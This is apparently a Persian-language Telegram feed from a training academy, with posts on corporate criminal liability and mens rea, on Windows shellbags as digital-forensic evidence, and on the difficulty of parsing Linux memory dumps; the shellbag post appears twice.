این موضوع بهویژه درباره مدیران و افرادی صادق است که از طرف سازمان اختیار قانونی دارند و به نام آن عمل میکنند. چون مدیران میتوانند بخشی از مسئولیتهایشان را به کارمندان تفویض کنند، هرگاه فردی در چارچوب همان اختیار تفویضشده کاری انجام دهد، ممکن است مسئولیت مستقیماً متوجه شرکت شود.
بنابراین اگر بتوان ثابت کرد که رفتار، تصمیم یا کوتاهی شرکت موجب انجام عمل مجرمانه شده است، قانون سازمان را مسئول مستقیم جرم میداند، نه فقط کارمند متخلف را.
⚖️ رابطه با مفهوم Mens Rea (نیت یا آگاهی مجرمانه)
در جرائم کیفری، اصل بر این است که دادگاه باید ثابت کند فرد از پیامدهای مجرمانهی کار خود آگاه بوده و قصد ارتکاب جرم را داشته است ؛ یعنی وجود Mens Rea.
در مورد یک شرکت، این آگاهی معمولاً در تصمیمها یا خطمشیهای مدیریتی جستجو میشود.
با این حال، نوعی از جرائم وجود دارند که در آنها نیازی به اثبات نیت یا قصد مجرمانه نیست و همین وقوع عمل ممنوعه برای مسئولیتپذیری کافی است.
به این جرائم میگویند: جرائم با مسئولیت مطلق (Strict Liability Offenses).
در چنین حالتی، اگر کارمند در حین انجام وظایف خود مرتکب تخلفی شود -مثلاً نقض مقررات زیستمحیطی یا امنیت داده - شرکت بدون نیاز به اثبات قصد، پاسخگو خواهد بود.
🧩 اصل انتساب رفتار کارمند به شرکت
وقتی قانون، مسئولیت را به شرکتها تسری دهد، رفتار یا حتی قصد ذهنی یک کارمند میتواند به شرکت نسبت داده شود.
اما این انتساب فقط زمانی معتبر است که:
رفتار انجامشده در چارچوب وظایف شغلی و اختیارات قانونی فرد باشد.
به این معیار، در حقوق کیفری و مدیریتی، اصطلاحاً “Course and Capacity of Employment Benchmark” میگویند.
اگر کارمند دست به کاری بزند که خارج از محدودهی اختیاراتش است (مثلاً دسترسی غیرمجاز یا کلاهبرداری رایانهای برای منافع شخصی)، مسئولیت او بر عهدهی خودش است ؛ هرچند که سازمان کاملاً از تبعات حقوقی آن در امان نخواهد بود، چون ممکن است نبود کنترلهای نظارتی یا سهلانگاری مدیریتی خود شرکت زیر سؤال برود.
جمع بندی
مقوله Direct Liability یعنی سازمان بدون واسطه در وقوع جرم نقش داشته (با اقدام یا کوتاهی).
و Mens Rea در شرکت از طریق تصمیمها، سیاستها و بیاحتیاطی مدیران نمایان میشود.
وStrict Liability یعنی کافی است عمل ممنوعه رخ دهد تا شرکت مسئول باشد، حتی بدون اثبات نیت.
وCourse and Capacity Benchmark حدی است که تشخیص میدهد عمل کارمند، کاری سازمانی بوده یا شخصی.
وجود کنترلها، آموزشها و خطمشیهای روشن میتواند از انتساب Mens Rea به سازمان جلوگیری کند و این دقیقاً مصداق Due Diligence / Due Care است.
#آکادمی_روزبه
❤4💯4
ردپا ها در فارنزیک
این قسمت: شل بگ
شلبگ (Shellbag) ساختاری در سیستمعامل ویندوز است که برای ذخیره تنظیمات نمایش پوشهها در Windows Explorer به کار میرود. هر زمان کاربر یک پوشه را باز میکند یا نمای آن را تغییر میدهد (مثل حالت آیکون، اندازه پنجره یا موقعیت آن)، این تنظیمات در رجیستری ویندوز بهصورت کلیدهای Shellbag ذخیره میشود تا در بازدید بعدی همان پوشه، تنظیمات قبلی حفظ گردد.
اطلاعات شلبگ در فایلهای رجیستری کاربران نگهداری میشود، از جمله:
HKCU\Software\Microsoft\Windows\Shell\Bags
HKCU\Software\Microsoft\Windows\Shell\BagMRU
همچنین این دادهها بهصورت فیزیکی در فایلهای NTUSER.DAT و USRCLASS.DAT مربوط به هر حساب کاربری ذخیره میشوند.
از دید دیجیتال فارنزیک (Digital Forensics)، شلبگها ارزش شواهدی بالایی دارند زیرا میتوانند سوابق پوشههایی را که کاربر باز کرده- اگر پوشه بعداً حذف شده باشد-نمایش دهند. آنها شامل مسیر کامل فولدر، شناسه دستگاه (Device ID)، و زمان آخرین دسترسی هستند. این ویژگیها کمک میکند تا فعالیتهای کاربر، استفاده از درایوهای خارجی (مثل USB)، یا مرور پوشههای شبکهای بازسازی شود.
ابزارهایی مانند ShellBagsView، RegRipper Shellbags plugin و ShellBags Explorer برای مشاهده و تحلیل این دادهها استفاده میشوند. در تحلیلهای قضایی، شلبگها معمولاً بهمنظور تعیین مسیرهایی که کاربر مشاهده کرده یا حذفشان کرده به کار میروند. به همین دلیل، دستکاری یا حذف آنها (یک اقدام ضدفارنزیکی) میتواند نشانهای از تلاش برای پنهانسازی فعالیتها باشد.
www.haumoun.com
www.roozbeh.academy
مثال عملی در فارنزیک:
فرض کنید مظنونی ادعا کند USB را وصل نکرده؛ شلبگ میتواند Device ID و مسیر F:\MalwareFolder را نشان دهد، حتی اگر درایو جدا شده باشد.
در پروندههای قضایی (مثل child exploitation یا data theft)، شلبگها برای اثبات “knowledge” کاربر (یعنی کاربر پوشه را دیده) استفاده میشوند.
این قسمت: شل بگ
شلبگ (Shellbag) ساختاری در سیستمعامل ویندوز است که برای ذخیره تنظیمات نمایش پوشهها در Windows Explorer به کار میرود. هر زمان کاربر یک پوشه را باز میکند یا نمای آن را تغییر میدهد (مثل حالت آیکون، اندازه پنجره یا موقعیت آن)، این تنظیمات در رجیستری ویندوز بهصورت کلیدهای Shellbag ذخیره میشود تا در بازدید بعدی همان پوشه، تنظیمات قبلی حفظ گردد.
اطلاعات شلبگ در فایلهای رجیستری کاربران نگهداری میشود، از جمله:
HKCU\Software\Microsoft\Windows\Shell\Bags
HKCU\Software\Microsoft\Windows\Shell\BagMRU
همچنین این دادهها بهصورت فیزیکی در فایلهای NTUSER.DAT و USRCLASS.DAT مربوط به هر حساب کاربری ذخیره میشوند.
از دید دیجیتال فارنزیک (Digital Forensics)، شلبگها ارزش شواهدی بالایی دارند زیرا میتوانند سوابق پوشههایی را که کاربر باز کرده- اگر پوشه بعداً حذف شده باشد-نمایش دهند. آنها شامل مسیر کامل فولدر، شناسه دستگاه (Device ID)، و زمان آخرین دسترسی هستند. این ویژگیها کمک میکند تا فعالیتهای کاربر، استفاده از درایوهای خارجی (مثل USB)، یا مرور پوشههای شبکهای بازسازی شود.
ابزارهایی مانند ShellBagsView، RegRipper Shellbags plugin و ShellBags Explorer برای مشاهده و تحلیل این دادهها استفاده میشوند. در تحلیلهای قضایی، شلبگها معمولاً بهمنظور تعیین مسیرهایی که کاربر مشاهده کرده یا حذفشان کرده به کار میروند. به همین دلیل، دستکاری یا حذف آنها (یک اقدام ضدفارنزیکی) میتواند نشانهای از تلاش برای پنهانسازی فعالیتها باشد.
www.haumoun.com
www.roozbeh.academy
مثال عملی در فارنزیک:
فرض کنید مظنونی ادعا کند USB را وصل نکرده؛ شلبگ میتواند Device ID و مسیر F:\MalwareFolder را نشان دهد، حتی اگر درایو جدا شده باشد.
در پروندههای قضایی (مثل child exploitation یا data theft)، شلبگها برای اثبات “knowledge” کاربر (یعنی کاربر پوشه را دیده) استفاده میشوند.
👏7❤3👍3
در دنیای فارنزیک دیجیتال، گرفتن و تحلیل memory dump (یا همان تصویر حافظه RAM) از ویندوز کار نسبتاً جاافتادهای است.
اما وقتی نوبت به سیستمهای Linux میرسه، ابزارها، قالب دادهها، و ساختارهای کرنل آنقدر متنوع و غیراستاندارد هستند که پارس کردن (parse) درست حافظهی لینوکس تقریباً همیشه مشکلزاست.
مقاله توضیح میده که:
مشکلات، از ناهمگونی بین نسخههای کرنل و buildهای سفارشی شروع میشن؛
بعد به مسئلهی symbol درست نداشتن (kernel symbols) میرسه؛
و نهایتاً خطاهای ابزارهایی مثل Volatility یا Rekall در تفسیر ساختارهای task_struct، mm_struct، dentry و غیره رو بررسی میکنه.
آخرین برنامه های آکادمی روزبه را از واتس اپ زیر دریافت کنید 09902857290
Www.haumoun.com
https://memoryforensic.com/the-problem-with-parsing-linux-based-memory-dumps/
اما وقتی نوبت به سیستمهای Linux میرسه، ابزارها، قالب دادهها، و ساختارهای کرنل آنقدر متنوع و غیراستاندارد هستند که پارس کردن (parse) درست حافظهی لینوکس تقریباً همیشه مشکلزاست.
مقاله توضیح میده که:
مشکلات، از ناهمگونی بین نسخههای کرنل و buildهای سفارشی شروع میشن؛
بعد به مسئلهی symbol درست نداشتن (kernel symbols) میرسه؛
و نهایتاً خطاهای ابزارهایی مثل Volatility یا Rekall در تفسیر ساختارهای task_struct، mm_struct، dentry و غیره رو بررسی میکنه.
آخرین برنامه های آکادمی روزبه را از واتس اپ زیر دریافت کنید 09902857290
Www.haumoun.com
https://memoryforensic.com/the-problem-with-parsing-linux-based-memory-dumps/
❤3⚡2